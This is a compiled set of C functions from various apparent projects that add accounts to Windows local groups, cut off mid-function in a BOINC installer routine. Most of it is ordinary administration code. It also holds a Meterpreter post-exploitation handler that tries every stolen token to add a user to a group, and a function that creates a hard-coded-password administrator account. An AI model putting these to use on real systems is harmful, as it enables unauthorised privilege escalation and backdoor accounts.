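/*
 * initializeAfsAdminGroup: seed the AFS client admin local group
 * (AFSCLIENT_ADMIN_GROUPNAMEW) with every current member of the built-in
 * Administrators group.
 *
 * The Administrators alias is resolved by RID (DOMAIN_ALIAS_RID_ADMINS) so the
 * lookup also works on localized systems; the English name "Administrators" is
 * only the fallback when that lookup fails.
 *
 * Returns NERR_Success (0), or the NET_API_STATUS of the failing
 * NetLocalGroupGetMembers / NetLocalGroupAddMembers call.  When the source
 * group is empty (dwNEntries == 0) NetLocalGroupAddMembers is still called
 * with zero entries, as before.
 */
UINT initializeAfsAdminGroup(void)
{
    NET_API_STATUS status;
    LOCALGROUP_MEMBERS_INFO_0 *gmAdmins = NULL;
    DWORD dwNEntries = 0, dwTEntries = 0;
    WCHAR AdminGroupName[UNLEN + 1];
    DWORD cchName = UNLEN;

    if (!LookupAliasFromRid(NULL, DOMAIN_ALIAS_RID_ADMINS, AdminGroupName, &cchName)) {
        /* if we fail, we will try the English string "Administrators" */
        wcsncpy(AdminGroupName, L"Administrators", UNLEN + 1);
        AdminGroupName[UNLEN] = 0;
    }

    /* Level 0 yields the members' SIDs, which is exactly the form that
     * NetLocalGroupAddMembers level 0 consumes below. */
    status = NetLocalGroupGetMembers(NULL, AdminGroupName, 0, (LPBYTE *)&gmAdmins,
                                     MAX_PREFERRED_LENGTH, &dwNEntries, &dwTEntries, NULL);
    if (status)
        return status;

    status = NetLocalGroupAddMembers(NULL, AFSCLIENT_ADMIN_GROUPNAMEW, 0,
                                     (LPBYTE)gmAdmins, dwNEntries);

    /* gmAdmins was allocated by NetLocalGroupGetMembers */
    NetApiBufferFree(gmAdmins);
    return status;
}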
/*
 * Returns TRUE if szGroupName already appears in the user's current group
 * list (pUserData->pGroupData[0..dwGroupCount)), FALSE otherwise.
 */
static BOOL
IsUserAlreadyMember(PMEMBERSHIP_USER_DATA pUserData, LPCTSTR szGroupName)
{
    DWORD idx;

    for (idx = 0; idx < pUserData->dwGroupCount; idx++)
    {
        if (_tcscmp(pUserData->pGroupData[idx].lgrui0_name, szGroupName) == 0)
            return TRUE;
    }

    return FALSE;
}

/*
 * Adds the user named by pUserData->szUserName to every group currently
 * selected in the IDC_USER_ADD_MEMBERSHIP_LIST list view of hwndDlg,
 * skipping groups the user already belongs to.
 *
 * A failing NetLocalGroupAddMembers call is reported in a message box with
 * its NET_API_STATUS code; processing continues with the next selection.
 * Returns TRUE if at least one membership was added.
 */
static BOOL
AddSelectedGroupsToUser(HWND hwndDlg, PMEMBERSHIP_USER_DATA pUserData)
{
    HWND hwndLV = GetDlgItem(hwndDlg, IDC_USER_ADD_MEMBERSHIP_LIST);
    TCHAR szGroupName[UNLEN];
    LOCALGROUP_MEMBERS_INFO_3 memberInfo;
    BOOL bAddedAny = FALSE;
    INT nItem;

    if (ListView_GetSelectedCount(hwndLV) == 0)
        return FALSE;

    /* Level 3: the member is identified by its "domain\name" string */
    memberInfo.lgrmi3_domainandname = pUserData->szUserName;

    for (nItem = ListView_GetNextItem(hwndLV, -1, LVNI_SELECTED);
         nItem != -1;
         nItem = ListView_GetNextItem(hwndLV, nItem, LVNI_SELECTED))
    {
        NET_API_STATUS status;

        /* Column 0 of the list view holds the group name */
        ListView_GetItemText(hwndLV, nItem, 0, szGroupName, UNLEN);

        if (IsUserAlreadyMember(pUserData, szGroupName))
            continue;

        status = NetLocalGroupAddMembers(NULL, szGroupName, 3, (LPBYTE)&memberInfo, 1);
        if (status == NERR_Success)
        {
            DebugPrintf(_TEXT("Selected group: %s"), szGroupName);
            bAddedAny = TRUE;
        }
        else
        {
            TCHAR szText[256];
            wsprintf(szText, TEXT("Error: %u"), status);
            MessageBox(NULL, szText, TEXT("NetLocalGroupAddMembers"), MB_ICONERROR | MB_OK);
        }
    }

    return bAddedAny;
}
/**
 * Add a member to a local domain group.
 *
 * The member name is first normalized against the working connection's
 * domain (NormalizeUserName); host, group and member names are then widened
 * to UTF-16 for a level-3 NetLocalGroupAddMembers call on
 * appContext->workConn->serverName.  In read-only mode
 * (appContext->gopts.isReadOnly) the operation is only traced, not performed.
 *
 * @param appContext Application context reference.
 * @param aliasNameC Group name.
 * @param memberNameC Member name.
 * @return 0 on success; error code on failure.  A failing
 *         NetLocalGroupAddMembers status is returned offset by
 *         ADT_WIN_ERR_BASE.
 */
DWORD AdtNetLocalGroupAddMember(
    IN AppContextTP appContext,
    IN PSTR aliasNameC,
    IN PSTR memberNameC
)
{
    DWORD dwError = ERROR_SUCCESS;
    LOCALGROUP_MEMBERS_INFO_3 memberinfo = {0};
    PWSTR hostName = NULL;
    PWSTR aliasName = NULL;
    PWSTR memberName = NULL;
    PSTR memberNameN = NULL;

    /* Expand a bare user name to the connection's domain form. */
    dwError = NormalizeUserName(memberNameC, appContext->workConn->domainName, &memberNameN);
    ADT_BAIL_ON_ERROR_NP(dwError);

    /* Widen all three names; the *_NP macros take the success condition. */
    dwError = LwMbsToWc16s((PCSTR) (appContext->workConn->serverName), &hostName);
    ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError);

    dwError = LwMbsToWc16s((PCSTR) aliasNameC, &aliasName);
    ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError);

    dwError = LwMbsToWc16s((PCSTR) memberNameN, &memberName);
    ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError);

    memberinfo.lgrmi3_domainandname = memberName;

    PrintStderr(appContext, LogLevelTrace, "%s: Adding member %s to group %s ...\n",
                appContext->actionName, memberNameN, aliasNameC);

    /* Perform the add operation (skipped entirely in read-only mode). */
    if(!appContext->gopts.isReadOnly) {
        dwError = NetLocalGroupAddMembers(hostName, aliasName, 3, &memberinfo, 1);
    }

    if (dwError) {
        /* Map the Win32/NET_API status into this tool's error range. */
        dwError += ADT_WIN_ERR_BASE;
        ADT_BAIL_ON_ERROR_NP(dwError);
    }

    PrintStderr(appContext, LogLevelTrace, "%s: Done adding member %s to group %s ...\n",
                appContext->actionName, memberNameN, aliasNameC);

cleanup:
    LW_SAFE_FREE_MEMORY(hostName);
    LW_SAFE_FREE_MEMORY(aliasName);
    LW_SAFE_FREE_MEMORY(memberName);
    LW_SAFE_FREE_MEMORY(memberNameN);

    return dwError;

error:
    goto cleanup;
}
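/**
 * Adds the account strUserName to the local group strGroupName.
 *
 * Uses NetLocalGroupAddMembers at information level 3, where the member is
 * identified by its "domain\name" string.  Returns true only when the API
 * reports NERR_Success; an already-existing membership (ERROR_MEMBER_IN_ALIAS)
 * is therefore reported as false, as before.
 *
 * The member descriptor only has to live for the duration of the call, so it
 * is a stack object (the previous heap allocation was never released), and the
 * GetBuffer() on strUserName is paired with ReleaseBuffer().
 */
bool UserUtilities::AddUserToGroup(CString strUserName, CString strGroupName)
{
    LOCALGROUP_MEMBERS_INFO_3 member = {0};

    // lgrmi3_domainandname is a non-const LPWSTR, hence the writable buffer;
    // the API does not modify it.
    member.lgrmi3_domainandname = strUserName.GetBuffer();

    NET_API_STATUS status = NetLocalGroupAddMembers(NULL, strGroupName, 3,
                                                    (LPBYTE)&member, 1);
    strUserName.ReleaseBuffer();

    return status == NERR_Success;
}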
/*
 * request_incognito_add_localgroup_user: Meterpreter "incognito" command
 * handler that adds a user to a local group on a host, trying the operation
 * under every impersonation token it can enumerate on the compromised machine.
 *
 * Server, group and user names come from the request packet as TLV strings.
 * Each token from get_token_list() is impersonated in turn and
 * NetLocalGroupAddMembers (level 3, "domain\name" member) is called; access /
 * logon errors move on to the next token, every other status terminates the
 * loop.  A one-line textual result is returned to the operator in
 * TLV_TYPE_INCOGNITO_GENERIC_RESPONSE; the function itself always returns
 * ERROR_SUCCESS.
 *
 * Defender's view: a successful call is a local-group membership change on
 * the host whose SAM holds the group (typically Security event 4732 when
 * security-group-management auditing is enabled), performed under a token
 * that may belong to a different logged-on user than the caller.
 *
 * NOTE(review): the three TLV strings are copied into fixed BUF_SIZE wide
 * buffers with mbstowcs() using strlen(src)+1 as the count, i.e. unbounded by
 * the destination, and a NULL TLV value would be dereferenced by strlen().
 * NOTE(review): the handle returned by OpenThreadToken is never closed.
 */
DWORD request_incognito_add_localgroup_user(Remote *remote, Packet *packet)
{
    DWORD dwLevel = 1, dwError = 0, num_tokens = 0, i;
    NET_API_STATUS nStatus;
    LOCALGROUP_MEMBERS_INFO_3 localgroup_member;
    SavedToken *token_list = NULL;
    HANDLE saved_token;
    wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], groupname_u[BUF_SIZE];
    char *dc_netbios_name, *groupname, *username, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";

    // Read arguments
    Packet *response = packet_create_response(packet);
    dc_netbios_name = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
    groupname = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_GROUPNAME);
    username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_USERNAME);

    // Widen to UTF-16 for the Net* API (see NOTE(review) above on bounds)
    mbstowcs(dc_netbios_name_u, dc_netbios_name, strlen(dc_netbios_name)+1);
    mbstowcs(username_u, username, strlen(username)+1);
    mbstowcs(groupname_u, groupname, strlen(groupname)+1);
    localgroup_member.lgrmi3_domainandname = username_u;

    // Save current thread token if one is currently being impersonated
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
        saved_token = INVALID_HANDLE_VALUE;

    token_list = get_token_list(&num_tokens);
    if (!token_list)
    {
        sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError());
        goto cleanup;
    }

    sprintf(return_value, "[*] Attempting to add user %s to localgroup %s on host %s\n", username, groupname, dc_netbios_name);

    // Attempt to add user to localgroup with every token
    for (i=0;i<num_tokens;i++)
        if (token_list[i].token)
        {
            // causes major problems (always error 127) once you have impersonated this token once. No idea why!!!
            if (!_stricmp("NT AUTHORITY\\ANONYMOUS LOGON", token_list[i].username))
                continue;

            // Impersonate only for the duration of the single API call
            ImpersonateLoggedOnUser(token_list[i].token);
            nStatus = NetLocalGroupAddMembers(dc_netbios_name_u, groupname_u, 3, (LPBYTE)&localgroup_member, 1);
            RevertToSelf();

            switch (nStatus)
            {
            // Authorization failures: this token is not good enough, try the next one
            case ERROR_ACCESS_DENIED:
            case ERROR_LOGON_FAILURE: // unknown username or bad password
            case ERROR_INVALID_PASSWORD:
                break;
            // Any other status is final for this request
            case NERR_Success:
                strncat(return_value, "[+] Successfully added user to local group\n", sizeof(return_value)-strlen(return_value)-1);
                goto cleanup;
            case NERR_InvalidComputer:
                strncat(return_value, "[-] Computer name invalid\n", sizeof(return_value)-strlen(return_value)-1);
                goto cleanup;
            case ERROR_NO_SUCH_MEMBER:
                strncat(return_value, "[-] User not found\n", sizeof(return_value)-strlen(return_value)-1);
                goto cleanup;
            case NERR_GroupNotFound:
            case 1376: // found by testing (also group not found)
                       // 1376 is ERROR_NO_SUCH_ALIAS
                strncat(return_value, "[-] Local group not found\n", sizeof(return_value)-strlen(return_value)-1);
                goto cleanup;
            case ERROR_MEMBER_IN_ALIAS:
                strncat(return_value, "[-] User already in group\n", sizeof(return_value)-strlen(return_value)-1);
                goto cleanup;
            default:
                sprintf(temp, "Unknown error: %d \n", nStatus);
                strncat(return_value, temp, sizeof(return_value)-strlen(return_value)-1);
                goto cleanup;
            }
        }

    strncat(return_value, "[-] Access denied with all tokens\n", sizeof(return_value)-strlen(return_value)-1);

cleanup:
    // NOTE(review): when get_token_list() failed, token_list is NULL here and
    // the loop relies on num_tokens still being 0 -- presumably guaranteed by
    // get_token_list; verify.
    for (i=0;i<num_tokens;i++)
        CloseHandle(token_list[i].token);
    free(token_list);

    packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value);
    packet_transmit_response(ERROR_SUCCESS, remote, response);

    // Restore token impersonation
    if (saved_token != INVALID_HANDLE_VALUE)
        ImpersonateLoggedOnUser(saved_token);

    return ERROR_SUCCESS;
}
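/**
 * @brief
 * add_to_administrators_group: returns 0 if 'dnamew\unamew' has been added
 * to local "Administrators" group; 1 otherwise.
 *
 * The group is located by its well-known SID (create_administrators_sid) and
 * mapped back to its actual, possibly localized, name with getgrpname(), so
 * the call does not depend on the English group name.  When the global
 * for_info_only is set nothing is changed and the intended action is only
 * printed.  An existing membership (ERROR_MEMBER_IN_ALIAS) counts as success.
 *
 * @param[in] dnamew - account name (domain part of 'domain\user')
 * @param[in] unamew - A pointer to a constant string that specifies
 *                     the name of the user account for which to set
 *                     information.
 *
 * @return int
 * @retval 0 : 'dnamew\unamew' has been added to local "Administrators" group.
 * @retval 1 : 'dnamew\unamew' could not add to local "Administrators" group.
 */
int
add_to_administrators_group(wchar_t *dnamew, wchar_t *unamew)
{
    SID *gsid = NULL;
    char *gname = NULL;  /* special group to add service account to */
    wchar_t full_unamew[PBS_MAXHOSTNAME+UNLEN+2];  /* domain\user\0 */
    int ret_val = 1;

    gsid = create_administrators_sid();
    if (gsid && (gname = getgrpname(gsid))) {
        LOCALGROUP_MEMBERS_INFO_3 member;
        NET_API_STATUS nstatus;
        wchar_t gnamew[GNLEN+1];

        /* mbstowcs() leaves the destination unterminated when the source
         * fills it completely, so terminate explicitly. */
        mbstowcs(gnamew, gname, GNLEN+1);
        gnamew[GNLEN] = L'\0';

#if _MSC_VER >= 1400
        /* bounded variant: an over-long name is truncated, not overflowed */
        swprintf(full_unamew, PBS_MAXHOSTNAME+UNLEN+2, L"%s\\%s", dnamew, unamew);
#else
        swprintf(full_unamew, L"%s\\%s", dnamew, unamew);
#endif
        full_unamew[PBS_MAXHOSTNAME+UNLEN+1] = L'\0';

        member.lgrmi3_domainandname = (wchar_t *)full_unamew;

        if (for_info_only)
            nstatus = NERR_Success;
        else
            nstatus = NetLocalGroupAddMembers(NULL, gnamew, 3, (LPBYTE)&member, 1);

        if ((nstatus == NERR_Success) || (nstatus == ERROR_MEMBER_IN_ALIAS)) {
            printf("%s %S to group \"%S\"\n",
                   (for_info_only ? "Adding" : "Added"), full_unamew, gnamew);
            ret_val = 0;
        } else {
            fprintf(stderr, "Failed to add %S to group \"%S\": error status =%d\n",
                    full_unamew, gnamew, nstatus);
        }
    }

    if (strlen(winlog_buffer) > 0) {  /* any error in getdefgrpname() */
        fprintf(stderr, "%s\n", winlog_buffer);
    }

    if (gsid)
        FreeSid(gsid);
    else
        fprintf(stderr, "Failed to add %S\\%S to Administrators group: bad SID\n",
                dnamew, unamew);

    if (gname)
        (void)free(gname);
    else
        fprintf(stderr, "Failed to get Administrators's actual group name\n");

    return (ret_val);
}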
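/*
 * localgroup_addmembers example: add one or more members to a local group on
 * <hostname> through libnetapi.
 *
 *   usage: localgroup_addmembers [options] hostname groupname member1 member2 ...
 *
 * The information level is fixed at 3 (members given as "domain\name"
 * strings); the level-0 path (members given as SID strings) is kept for
 * reference.  The exit status is the NET_API_STATUS of the last failing
 * libnetapi call, or 0.
 */
int main(int argc, const char **argv)
{
	NET_API_STATUS status;
	struct libnetapi_ctx *ctx = NULL;
	const char *hostname = NULL;
	const char *groupname = NULL;
	struct LOCALGROUP_MEMBERS_INFO_0 *g0 = NULL;
	struct LOCALGROUP_MEMBERS_INFO_3 *g3 = NULL;
	uint32_t total_entries = 0;
	uint8_t *buffer = NULL;
	uint32_t level = 3;
	const char **names = NULL;
	uint32_t i = 0;
	poptContext pc;
	int opt;

	struct poptOption long_options[] = {
		POPT_AUTOHELP
		POPT_COMMON_LIBNETAPI_EXAMPLES
		POPT_TABLEEND
	};

	status = libnetapi_init(&ctx);
	if (status != 0) {
		return status;
	}

	pc = poptGetContext("localgroup_addmembers", argc, argv, long_options, 0);

	poptSetOtherOptionHelp(pc, "hostname groupname member1 member2 ...");
	while ((opt = poptGetNextOpt(pc)) != -1) {
	}

	if (!poptPeekArg(pc)) {
		poptPrintHelp(pc, stderr, 0);
		goto out;
	}
	hostname = poptGetArg(pc);

	if (!poptPeekArg(pc)) {
		poptPrintHelp(pc, stderr, 0);
		goto out;
	}
	groupname = poptGetArg(pc);

	if (!poptPeekArg(pc)) {
		poptPrintHelp(pc, stderr, 0);
		goto out;
	}
	/* the remaining positional arguments are the members */
	names = poptGetArgs(pc);
	for (i = 0; names[i] != NULL; i++) {
		total_entries++;
	}

	switch (level) {
	case 0:
		status = NetApiBufferAllocate(sizeof(struct LOCALGROUP_MEMBERS_INFO_0) * total_entries,
					      (void **)&g0);
		if (status) {
			printf("NetApiBufferAllocate failed with: %s\n",
			       libnetapi_get_error_string(ctx, status));
			goto out;
		}
		for (i = 0; i < total_entries; i++) {
			/* NOTE(review): the SID allocated by ConvertStringSidToSid
			 * is not released here, as in the original example. */
			if (!ConvertStringSidToSid(names[i], &g0[i].lgrmi0_sid)) {
				printf("could not convert sid\n");
				goto out;
			}
		}
		buffer = (uint8_t *)g0;
		break;
	case 3:
		status = NetApiBufferAllocate(sizeof(struct LOCALGROUP_MEMBERS_INFO_3) * total_entries,
					      (void **)&g3);
		if (status) {
			printf("NetApiBufferAllocate failed with: %s\n",
			       libnetapi_get_error_string(ctx, status));
			goto out;
		}
		for (i = 0; i < total_entries; i++) {
			g3[i].lgrmi3_domainandname = names[i];
		}
		buffer = (uint8_t *)g3;
		break;
	default:
		break;
	}

	/* NetLocalGroupAddMembers */
	status = NetLocalGroupAddMembers(hostname, groupname, level, buffer, total_entries);
	if (status != 0) {
		printf("NetLocalGroupAddMembers failed with: %s\n",
		       libnetapi_get_error_string(ctx, status));
	}

out:
	/* only one of g0/g3 was allocated (depending on level); the other is NULL */
	if (g0) {
		NetApiBufferFree(g0);
	}
	if (g3) {
		NetApiBufferFree(g3);
	}
	libnetapi_free(ctx);
	poptFreeContext(pc);
	return status;
}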
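/*
 * rollback_audit_user: best-effort removal of the "audit" account created by
 * create_admin_user() when a later provisioning step fails, so that no
 * half-configured account with a known password is left on the machine.
 * The outcome is only printed; the caller returns its original error.
 */
static void rollback_audit_user(void)
{
    NET_API_STATUS rc = NetUserDel(NULL, _T("audit"));
    if (rc != NERR_Success) {
        _tprintf(_T("NetUserDel (rollback) FAIL %lu 0x%08lx\r\n"), rc, rc);
    }
}

/*
 * create_admin_user: create the local user "audit" and make it a member of
 * the local "Administrators" group.
 *
 * Returns 0 on success, otherwise the NET_API_STATUS / Win32 error of the
 * failing call.  If the account was created but resolving its SID or adding
 * it to the group fails, the account is deleted again before returning.
 *
 * SECURITY: user name and password are hard-coded literals.  Anyone who can
 * read this binary (or this source) knows the credentials of an
 * administrator account on every machine it was run on; a real deployment
 * must take them from a protected source and/or force a password change on
 * first logon.
 */
DWORD create_admin_user(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;
    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;
    BYTE Sid[256];                                  // 256 bytes should be enough for everybody :)
    DWORD cbSid = sizeof(Sid);
    TCHAR Domain[256];
    DWORD cbDomain = sizeof(Domain) / sizeof(Domain[0]);   // LookupAccountName wants TCHARs, not bytes

    OutputDebugString( _T("ADDUSER: in create_admin_user") );

    //
    // Create user
    // http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx
    //
    memset(&ud, 0, sizeof(ud));
    ud.usri1_name = _T("audit");                        // username
    ud.usri1_password = _T("Test123456789!");           // password (hard-coded, see header)
    ud.usri1_priv = USER_PRIV_USER;                     // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT;     // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,           // local server
        1,              // information level
        (LPBYTE)&ud,
        NULL            // error value
    );
    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %lu 0x%08lx\r\n"), rc, rc);
        return rc;
    }

    //
    // Get user SID
    // http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx
    //
    b = LookupAccountName(
        NULL,           // local server
        _T("audit"),    // account name
        Sid,            // SID
        &cbSid,         // SID size
        Domain,         // Domain
        &cbDomain,      // Domain size
        &snu            // SID_NAME_USE (enum)
    );
    if (!b) {
        dw = GetLastError();    // read before any other call can clobber it
        _tprintf(_T("LookupAccountName FAIL %lu 0x%08lx\r\n"), dw, dw);
        rollback_audit_user();
        return dw;
    }

    //
    // Add user to "Administrators" local group
    // http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx
    //
    memset(&gd, 0, sizeof(gd));
    gd.lgrmi0_sid = (PSID)Sid;      // level 0: member identified by SID

    rc = NetLocalGroupAddMembers(
        NULL,                   // local server
        _T("Administrators"),
        0,                      // information level
        (LPBYTE)&gd,
        1                       // only one entry
    );
    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %lu 0x%08lx\r\n"), rc, rc);
        rollback_audit_user();
        return rc;
    }

    OutputDebugString( _T("ADDUSER: admin user created successfully!") );
    return 0;
}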
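/////////////////////////////////////////////////////////////////////
//
// Function:    CACreateBOINCGroups::OnExecution
//
// Description: Creates the local groups 'boinc_admins', 'boinc_users' and
//              'boinc_projects' if they do not exist yet and seeds their
//              membership:
//                - boinc_admins   <- BUILTIN\Administrators, the installing
//                                    user and (when protected application
//                                    execution is enabled) boinc_master;
//                - boinc_projects <- boinc_project (protected execution only);
//                - the local Users group (GROUPALIAS_USERS) <- boinc_project
//                  and boinc_master (protected execution only).
//              Adding an existing member (ERROR_MEMBER_IN_ALIAS) is accepted,
//              so the action is safe to re-run.  The group names are exported
//              as MSI properties and a reboot is scheduled if any group had
//              to be created.
//
//              Returns ERROR_SUCCESS, ERROR_INSTALL_FAILURE, or the status of
//              a failing GetProperty call.  All SIDs are released on every
//              exit path; the SID returned by ConvertStringSidToSid is
//              released with LocalFree as its documentation requires.
//
/////////////////////////////////////////////////////////////////////
UINT CACreateBOINCGroups::OnExecution()
{
    NET_API_STATUS  nasReturnValue;
    DWORD           dwParameterError;
    UINT            uiReturnValue = ERROR_INSTALL_FAILURE;
    BOOL            bBOINCAdminsCreated = FALSE;
    BOOL            bBOINCUsersCreated = FALSE;
    BOOL            bBOINCProjectsCreated = FALSE;
    BOOL            bProtectedExecution = FALSE;
    tstring         strUserSID;
    tstring         strUsersGroupName;
    tstring         strBOINCMasterAccountUsername;
    tstring         strBOINCProjectAccountUsername;
    tstring         strEnableProtectedApplicationExecution;
    PSID            pAdminSID = NULL;
    PSID            pInstallingUserSID = NULL;
    PSID            pBOINCMasterSID = NULL;
    PSID            pBOINCProjectSID = NULL;
    SID_IDENTIFIER_AUTHORITY  SIDAuthNT = SECURITY_NT_AUTHORITY;
    LOCALGROUP_INFO_1         lgrpiAdmins;
    LOCALGROUP_INFO_1         lgrpiUsers;
    LOCALGROUP_INFO_1         lgrpiProjects;
    LOCALGROUP_MEMBERS_INFO_0 lgrmiMember;

    uiReturnValue = GetProperty( _T("UserSID"), strUserSID );
    if ( uiReturnValue ) return uiReturnValue;

    uiReturnValue = GetProperty( _T("GROUPALIAS_USERS"), strUsersGroupName );
    if ( uiReturnValue ) return uiReturnValue;

    uiReturnValue = GetProperty( _T("BOINC_MASTER_USERNAME"), strBOINCMasterAccountUsername );
    if ( uiReturnValue ) return uiReturnValue;

    uiReturnValue = GetProperty( _T("BOINC_PROJECT_USERNAME"), strBOINCProjectAccountUsername );
    if ( uiReturnValue ) return uiReturnValue;

    uiReturnValue = GetProperty( _T("ENABLEPROTECTEDAPPLICATIONEXECUTION2"), strEnableProtectedApplicationExecution );
    if ( uiReturnValue ) return uiReturnValue;

    bProtectedExecution = (_T("1") == strEnableProtectedApplicationExecution);

    // Every failure below jumps to cleanup with this status so that the SIDs
    // allocated so far are released.
    uiReturnValue = ERROR_INSTALL_FAILURE;

    // Create a SID for the BUILTIN\Administrators group.
    if(!AllocateAndInitializeSid( &SIDAuthNT, 2,
                                  SECURITY_BUILTIN_DOMAIN_RID,
                                  DOMAIN_ALIAS_RID_ADMINS,
                                  0, 0, 0, 0, 0, 0,
                                  &pAdminSID)) {
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            GetLastError(),
            _T("AllocateAndInitializeSid Error for BUILTIN\\Administrators")
        );
        goto cleanup;
    }

    // Create a SID for the current logged in user.
    if(!ConvertStringSidToSid(strUserSID.c_str(), &pInstallingUserSID)) {
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            GetLastError(),
            _T("ConvertStringSidToSid Error for installing user")
        );
        goto cleanup;
    }

    // Create SIDs for the 'boinc_master' and 'boinc_project' service accounts;
    // they only exist when protected application execution is enabled.
    if (bProtectedExecution) {
        if(!GetAccountSid(NULL, strBOINCMasterAccountUsername.c_str(), &pBOINCMasterSID)) {
            LogMessage(
                INSTALLMESSAGE_ERROR,
                NULL,
                NULL,
                NULL,
                GetLastError(),
                _T("GetAccountSid Error for 'boinc_master' user account")
            );
            goto cleanup;
        }

        if(!GetAccountSid(NULL, strBOINCProjectAccountUsername.c_str(), &pBOINCProjectSID)) {
            // message previously named 'boinc_master' for this lookup too
            LogMessage(
                INSTALLMESSAGE_ERROR,
                NULL,
                NULL,
                NULL,
                GetLastError(),
                _T("GetAccountSid Error for 'boinc_project' user account")
            );
            goto cleanup;
        }
    }

    // Create the 'boinc_admins' group if needed
    //
    lgrpiAdmins.lgrpi1_name = _T("boinc_admins");
    lgrpiAdmins.lgrpi1_comment = _T("Accounts in this group can control the BOINC client.");

    nasReturnValue = NetLocalGroupAdd(
        NULL,
        1,
        (LPBYTE)&lgrpiAdmins,
        &dwParameterError
    );

    if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) {
        LogMessage(
            INSTALLMESSAGE_INFO,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("NetLocalGroupAdd retval")
        );
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("Failed to create the 'boinc_admins' group.")
        );
        goto cleanup;
    }

    if (NERR_Success == nasReturnValue) {
        bBOINCAdminsCreated = TRUE;
    }

    // Populate 'boinc_admins' with the default accounts.  This runs whether or
    // not the group was just created; existing memberships are tolerated.
    //
    lgrmiMember.lgrmi0_sid = pAdminSID;

    nasReturnValue = NetLocalGroupAddMembers(
        NULL,
        _T("boinc_admins"),
        0,
        (LPBYTE)&lgrmiMember,
        1
    );

    if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
        LogMessage(
            INSTALLMESSAGE_INFO,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("NetLocalGroupAddMembers retval")
        );
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("Failed to add user to the 'boinc_admins' group (Administrator).")
        );
        goto cleanup;
    }

    lgrmiMember.lgrmi0_sid = pInstallingUserSID;

    nasReturnValue = NetLocalGroupAddMembers(
        NULL,
        _T("boinc_admins"),
        0,
        (LPBYTE)&lgrmiMember,
        1
    );

    if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
        LogMessage(
            INSTALLMESSAGE_INFO,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("NetLocalGroupAddMembers retval")
        );
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("Failed to add user to the 'boinc_admins' group (Installing User).")
        );
        goto cleanup;
    }

    if (bProtectedExecution) {
        lgrmiMember.lgrmi0_sid = pBOINCMasterSID;

        nasReturnValue = NetLocalGroupAddMembers(
            NULL,
            _T("boinc_admins"),
            0,
            (LPBYTE)&lgrmiMember,
            1
        );

        if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) {
            LogMessage(
                INSTALLMESSAGE_INFO,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("NetLocalGroupAddMembers retval")
            );
            LogMessage(
                INSTALLMESSAGE_ERROR,
                NULL,
                NULL,
                NULL,
                nasReturnValue,
                _T("Failed to add user to the 'boinc_admins' group (BOINC Master).")
            );
            goto cleanup;
        }
    }

    // Create the 'boinc_users' group if needed
    //
    lgrpiUsers.lgrpi1_name = _T("boinc_users");
    lgrpiUsers.lgrpi1_comment = _T("Accounts in this group can monitor the BOINC client.");

    nasReturnValue = NetLocalGroupAdd(
        NULL,
        1,
        (LPBYTE)&lgrpiUsers,
        &dwParameterError
    );

    if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) {
        LogMessage(
            INSTALLMESSAGE_INFO,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("NetLocalGroupAdd retval")
        );
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("Failed to create the 'boinc_users' group.")
        );
        goto cleanup;
    }

    if (NERR_Success == nasReturnValue) {
        bBOINCUsersCreated = TRUE;
    }

    // Create the 'boinc_projects' group if needed
    //
    lgrpiProjects.lgrpi1_name = _T("boinc_projects");
    lgrpiProjects.lgrpi1_comment = _T("Accounts in this group are used to execute boinc applications.");

    nasReturnValue = NetLocalGroupAdd(
        NULL,
        1,
        (LPBYTE)&lgrpiProjects,
        &dwParameterError
    );

    if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) {
        LogMessage(
            INSTALLMESSAGE_INFO,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("NetLocalGroupAdd retval")
        );
        LogMessage(
            INSTALLMESSAGE_ERROR,
            NULL,
            NULL,
            NULL,
            nasReturnValue,
            _T("Failed to create the 'boinc_projects' group.")
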